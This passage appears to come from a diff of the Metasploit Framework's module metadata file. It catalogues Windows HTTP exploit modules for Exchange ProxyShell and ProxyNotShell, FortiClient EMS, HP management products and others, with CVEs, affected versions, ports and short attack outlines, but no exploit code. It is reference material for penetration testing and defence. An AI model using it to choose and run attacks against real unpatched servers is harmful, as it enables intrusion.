"Spencer McIntyre", + "DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q", + "Piotr Bazydło", + "Rich Warren", + "Soroush Dalili" + ], + "description": "This module chains two vulnerabilities on Microsoft Exchange Server\n that, when combined, allow an authenticated attacker to interact with\n the Exchange Powershell backend (CVE-2022-41040), where a\n deserialization flaw can be leveraged to obtain code execution\n (CVE-2022-41082). This exploit only support Exchange Server 2019.\n\n These vulnerabilities were patched in November 2022.", + "references": [ + "CVE-2022-41040", + "CVE-2022-41082", + "URL-https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend", + "URL-https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/", + "URL-https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9", + "URL-https://rw.md/2022/11/09/ProxyNotRelay.html" + ], + "platform": "Windows", + "arch": "cmd, x64, x86", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Dropper", + "Windows Command" + ], + "mod_time": "2022-11-28 10:06:14 +0000", + "path": "/modules/exploits/windows/http/exchange_proxynotshell_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/exchange_proxynotshell_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "AKA": [ + "ProxyNotShell" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/exchange_proxyshell_rce": { + "name": "Microsoft Exchange ProxyShell RCE", + "fullname": "exploit/windows/http/exchange_proxyshell_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-04-06", + "type": "exploit", + "author": [ + "Orange Tsai", + "Jang ( ", + "PeterJson", + "brandonshi123", + "mekhalleh (RAMELLA Sébastien)", + "Donny Maasland", + "Rich Warren", + "Spencer McIntyre", + "wvu " + ], + "description": "This module exploits a vulnerability on Microsoft Exchange Server that\n allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an\n arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15,\n Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5,\n Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9.\n\n All components are vulnerable by default.", + "references": [ + "CVE-2021-34473", + "CVE-2021-34523", + "CVE-2021-31207", + "URL-https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "URL-https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf", + "URL-https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/", + "URL-https://github.com/dmaasland/proxyshell-poc" + ], + "platform": "Windows", + "arch": "cmd, x64, x86", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Powershell", + "Windows Dropper", + "Windows Command" + ], + "mod_time": "2022-12-02 15:55:10 +0000", + "path": "/modules/exploits/windows/http/exchange_proxyshell_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/exchange_proxyshell_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "AKA": [ + "ProxyShell" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/ezserver_http": { + "name": "EZHomeTech EzServer Stack Buffer Overflow Vulnerability", + "fullname": "exploit/windows/http/ezserver_http", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-06-18", + "type": "exploit", + "author": [ + "modpr0be " + ], + "description": "This module exploits a stack buffer overflow in the EZHomeTech EZServer\n for versions 6.4.017 and earlier. If a malicious user sends packets\n containing an overly long string, it may be possible to execute a\n payload remotely. Due to size constraints, this module uses the\n Egghunter technique.", + "references": [ + "OSVDB-83065", + "BID-54056", + "EDB-19266", + "URL-http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/" + ], + "platform": "Windows", + "arch": "", + "rport": 8000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ezserver_http.rb", + "is_install_path": true, + "ref_name": "windows/http/ezserver_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/fdm_auth_header": { + "name": "Free Download Manager Remote Control Server Buffer Overflow", + "fullname": "exploit/windows/http/fdm_auth_header", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-02-02", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Free Download Manager\n Remote Control 2.5 Build 758. When sending a specially crafted\n Authorization header, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2009-0183", + "OSVDB-51745" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Free Download Manager 2.5 Build 758" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/fdm_auth_header.rb", + "is_install_path": true, + "ref_name": "windows/http/fdm_auth_header", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/file_sharing_wizard_seh": { + "name": "File Sharing Wizard - POST SEH Overflow", + "fullname": "exploit/windows/http/file_sharing_wizard_seh", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-09-24", + "type": "exploit", + "author": [ + "x00pwn", + "Dean Welch " + ], + "description": "This module exploits an unauthenticated HTTP POST SEH-based buffer overflow in File Sharing Wizard 1.5.0.", + "references": [ + "CVE-2019-16724", + "EDB-47412" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Vista / Windows 7 (x86)" + ], + "mod_time": "2020-03-05 14:48:37 +0000", + "path": "/modules/exploits/windows/http/file_sharing_wizard_seh.rb", + "is_install_path": true, + "ref_name": "windows/http/file_sharing_wizard_seh", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/flexdotnetcms_upload_exec": { + "name": "FlexDotnetCMS Arbitrary ASP File Upload", + "fullname": "exploit/windows/http/flexdotnetcms_upload_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-09-28", + "type": "exploit", + "author": [ + "Erik Wynter" + ], + "description": "This module exploits an arbitrary file upload vulnerability in\n FlexDotnetCMS v1.5.8 and prior in order to execute arbitrary\n commands with elevated privileges.\n\n The module first tries to authenticate to FlexDotnetCMS via an HTTP\n POST request to `/login`. It then attempts to upload a random TXT\n file and subsequently uses the FlexDotnetCMS file editor to rename\n the TXT file to an ASP file. If this succeeds, the target is\n vulnerable and the ASP file is generated as a copy of the TXT file,\n which remains on the server.\n\n Next, the module sends another request to rename the TXT file to an\n ASP file, this time adding the payload. Finally, the module tries\n to execute the ASP payload via a simple HTTP GET request to\n `/media/uploads/asp_payload`\n\n Valid credentials for a FlexDotnetCMS user with permissions to use\n the FileManager are required. This module has been successfully\n tested against FlexDotnetCMS v1.5.8 running on Windows Server 2012.", + "references": [ + "CVE-2020-27386" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows (x86)", + "Windows (x64)" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/flexdotnetcms_upload_exec", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/forticlient_ems_fctid_sqli": { + "name": "FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE", + "fullname": "exploit/windows/http/forticlient_ems_fctid_sqli", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-04-21", + "type": "exploit", + "author": [ + "Zach Hanley", + "James Horseman", + "jheysel-r7", + "Spencer McIntyre" + ], + "description": "An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).\n FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized\n platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which\n can be sent directly into database queries.\n\n FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013\n and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.\n In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable\n SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code\n execution in the context of NT AUTHORITY\\SYSTEM\n\n Affected versions of FortiClient EMS include:\n 7.2.0 through 7.2.2\n 7.0.1 through 7.0.10\n\n Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.\n\n It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient\n EMS for the necessary vulnerable services to be available.", + "references": [ + "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/", + "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-revisiting-fortinet-forticlient-ems-to-exploit-7-2-x/", + "URL-https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py", + "CVE-2023-48788" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 8013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Target" + ], + "mod_time": "2024-07-25 09:14:27 +0000", + "path": "/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb", + "is_install_path": true, + "ref_name": "windows/http/forticlient_ems_fctid_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/fortilogger_arbitrary_fileupload": { + "name": "FortiLogger Arbitrary File Upload Exploit", + "fullname": "exploit/windows/http/fortilogger_arbitrary_fileupload", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-02-26", + "type": "exploit", + "author": [ + "Berkan Er " + ], + "description": "This module exploits an unauthenticated arbitrary file upload\n via insecure POST request. It has been tested on versions < 5.2.0 in\n Windows 10 Enterprise.", + "references": [ + "CVE-2021-3378", + "URL-https://erberkan.github.io/2021/cve-2021-3378/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 5000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "FortiLogger < 5.2.0" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb", + "is_install_path": true, + "ref_name": "windows/http/fortilogger_arbitrary_fileupload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "unreliable-session" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/generic_http_dll_injection": { + "name": "Generic Web Application DLL Injection", + "fullname": "exploit/windows/http/generic_http_dll_injection", + "aliases": [], + "rank": 0, + "disclosure_date": "2015-03-04", + "type": "exploit", + "author": [ + "Matthew Hall " + ], + "description": "This is a general-purpose module for exploiting conditions where a HTTP request\n triggers a DLL load from an specified SMB share. This module serves payloads as\n DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would\n trigger the load of the DLL.", + "references": [ + "CWE-427" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/generic_http_dll_injection.rb", + "is_install_path": true, + "ref_name": "windows/http/generic_http_dll_injection", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/geutebrueck_gcore_x64_rce_bo": { + "name": "Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE", + "fullname": "exploit/windows/http/geutebrueck_gcore_x64_rce_bo", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-01-24", + "type": "exploit", + "author": [ + "Luca Cappiello", + "Maurice Popp" + ], + "description": "This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe).\n The vulnerable webserver is running on Port 13003 and Port 13004, does not require\n authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).", + "references": [ + "EDB-41153", + "CVE-2017-11517", + "URL-https://www.geutebrueck.com" + ], + "platform": "Windows", + "arch": "", + "rport": 13003, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic Targeting", + "GCore 1.3.8.42, Windows x64 (Win7+)", + "GCore 1.4.2.37, Windows x64 (Win7+)" + ], + "mod_time": "2024-04-17 13:00:41 +0000", + "path": "/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb", + "is_install_path": true, + "ref_name": "windows/http/geutebrueck_gcore_x64_rce_bo", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/git_lfs_rce": { + "name": "Git Remote Code Execution via git-lfs (CVE-2020-27955)", + "fullname": "exploit/windows/http/git_lfs_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-11-04", + "type": "exploit", + "author": [ + "Dawid Golunski", + "space-r7", + "jheysel-r7" + ], + "description": "A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for\n versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked\n into cloning the attacker’s malicious repository using a vulnerable Git version control tool", + "references": [ + "CVE-2020-27955", + "URL-https://www.helpnetsecurity.com/2020/11/05/cve-2020-27955/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Git LFS <= 2.12" + ], + "mod_time": "2021-09-14 16:32:25 +0000", + "path": "/modules/exploits/windows/http/git_lfs_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/git_lfs_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/gitstack_rce": { + "name": "GitStack Unsanitized Argument RCE", + "fullname": "exploit/windows/http/gitstack_rce", + "aliases": [], + "rank": 500, + "disclosure_date": "2018-01-15", + "type": "exploit", + "author": [ + "Kacper Szurek", + "Jacob Robles" + ], + "description": "This module exploits a remote code execution vulnerability that\n exists in GitStack through v2.3.10, caused by an unsanitized argument\n being passed to an exec function call. This module has been tested\n on GitStack v2.3.10.", + "references": [ + "CVE-2018-5955", + "EDB-43777", + "EDB-44044", + "URL-https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/gitstack_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/gitstack_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_autopass_license_traversal": { + "name": "HP AutoPass License Server File Upload", + "fullname": "exploit/windows/http/hp_autopass_license_traversal", + "aliases": [], + "rank": 500, + "disclosure_date": "2014-01-10", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a code execution flaw in HP AutoPass License Server. It abuses two\n weaknesses in order to get its objective. First, the AutoPass application doesn't enforce\n authentication in the CommunicationServlet component. Second, it's possible to abuse a\n directory traversal when uploading files thorough the same component, allowing to upload\n an arbitrary payload embedded in a JSP. The module has been tested successfully on\n HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50.", + "references": [ + "CVE-2013-6221", + "ZDI-14-195", + "BID-67989", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04333125" + ], + "platform": "Java", + "arch": "java", + "rport": 5814, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2003 SP2 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", + "Windows 2008 32 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", + "Windows 2008 64 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", + "Windows 2012 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_autopass_license_traversal.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_autopass_license_traversal", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/hp_imc_bims_upload": { + "name": "HP Intelligent Management Center BIMS UploadServlet Directory Traversal", + "fullname": "exploit/windows/http/hp_imc_bims_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-10-08", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a directory traversal vulnerability on the version 5.2 of the BIMS\n component from the HP Intelligent Management Center. The vulnerability exists in the\n UploadServlet, allowing the user to download and upload arbitrary files. This module has\n been tested successfully on HP Intelligent Management Center with BIMS 5.2 E0401 on Windows\n 2003 SP2.", + "references": [ + "CVE-2013-4822", + "OSVDB-98247", + "BID-62895", + "ZDI-13-238", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943425" + ], + "platform": "Windows", + "arch": "java", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP Intelligent Management Center 5.1 E0202 - 5.2 E0401 / BIMS 5.1 E0201 - 5.2 E0401 / Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_imc_bims_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_imc_bims_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/hp_imc_java_deserialize": { + "name": "HP Intelligent Management Java Deserialization RCE", + "fullname": "exploit/windows/http/hp_imc_java_deserialize", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-10-03", + "type": "exploit", + "author": [ + "Steven Seeley (mr_me) of Offensive Security", + "Carsten " + ], + "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of\n Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required to exploit\n this vulnerability.\n\n The specific flaw exists within the WebDMDebugServlet, which listens on TCP ports 8080 and 8443 by\n default. The issue results from the lack of proper validation of user-supplied data, which can result\n in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary\n code in the context of SYSTEM.", + "references": [ + "CVE-2017-12557", + "URL-https://github.com/pimps/ysoserial-modified/blob/master/src/main/java/ysoserial/payloads/JSON1.java", + "URL-https://www.zerodayinitiative.com/advisories/ZDI-17-832/" + ], + "platform": "Windows", + "arch": "", + "rport": "8080", + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HPE IMC 7.3 E0504P2 and earlier / Windows" + ], + "mod_time": "2021-02-16 14:36:38 +0000", + "path": "/modules/exploits/windows/http/hp_imc_java_deserialize.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_imc_java_deserialize", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_imc_mibfileupload": { + "name": "HP Intelligent Management Center Arbitrary File Upload", + "fullname": "exploit/windows/http/hp_imc_mibfileupload", + "aliases": [], + "rank": 500, + "disclosure_date": "2013-03-07", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a code execution flaw in HP Intelligent Management Center.\n The vulnerability exists in the mibFileUpload which is accepting unauthenticated\n file uploads and handling zip contents in an insecure way. Combining both weaknesses\n a remote attacker can accomplish arbitrary file upload. This module has been tested\n successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.", + "references": [ + "CVE-2012-5201", + "OSVDB-91026", + "BID-58385", + "ZDI-13-050", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276" + ], + "platform": "Windows", + "arch": "java", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP Intelligent Management Center 5.1 E0202 / Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_imc_mibfileupload.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_imc_mibfileupload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/hp_loadrunner_copyfiletoserver": { + "name": "HP LoadRunner EmulationAdmin Web Service Directory Traversal", + "fullname": "exploit/windows/http/hp_loadrunner_copyfiletoserver", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-10-30", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a directory traversal vulnerability in version 11.52 of HP\n LoadRunner. The vulnerability exists in the EmulationAdmin web service, specifically\n in the copyFileToServer method, allowing the upload of arbitrary files. This module has\n been tested successfully on HP LoadRunner 11.52 on Windows 2003 SP2.", + "references": [ + "CVE-2013-4837", + "OSVDB-99231", + "BID-63475", + "ZDI-13-259", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03969437" + ], + "platform": "Windows", + "arch": "java", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP LoadRunner 11.52" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_loadrunner_copyfiletoserver", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/hp_mpa_job_acct": { + "name": "HP Managed Printing Administration jobAcct Remote Command Execution", + "fullname": "exploit/windows/http/hp_mpa_job_acct", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-12-21", + "type": "exploit", + "author": [ + "Andrea Micalizzi", + "juan vazquez " + ], + "description": "This module exploits an arbitrary file upload vulnerability on HP Managed Printing\n Administration 2.6.3 and prior versions. The vulnerability exists in the UploadFiles()\n function from the MPAUploader.Uploader.1 control, loaded and used by the server.\n The function can be abused via directory traversal and null byte injection in order\n to achieve arbitrary file upload. In order to exploit successfully, a few conditions\n must be met. First, a writable location under the context of Internet Guest Account\n (IUSR_*) or Everyone is required. By default, this module will attempt to write to\n /hpmpa/userfiles/, but the WRITEWEBFOLDER option can be used to provide\n another writable path. Second, the writable path must also be readable by a browser,\n so this typically means a location under wwwroot. Finally, you cannot overwrite\n a file with the same name as the payload.", + "references": [ + "CVE-2011-4166", + "OSVDB-78015", + "BID-51174", + "ZDI-11-352", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03128469" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/http/hp_mpa_job_acct.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_mpa_job_acct", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_getnnmdata_hostname": { + "name": "HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_getnnmdata_hostname", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-05-11", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted Hostname parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-1555", + "OSVDB-64976" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.50", + "HP OpenView Network Node Manager 7.53" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_getnnmdata_hostname", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_getnnmdata_icount": { + "name": "HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_getnnmdata_icount", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-05-11", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted ICount parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-1554", + "OSVDB-64976" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.50", + "HP OpenView Network Node Manager 7.53" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_getnnmdata_icount", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_getnnmdata_maxage": { + "name": "HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_getnnmdata_maxage", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-05-11", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-1553", + "OSVDB-64976" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", 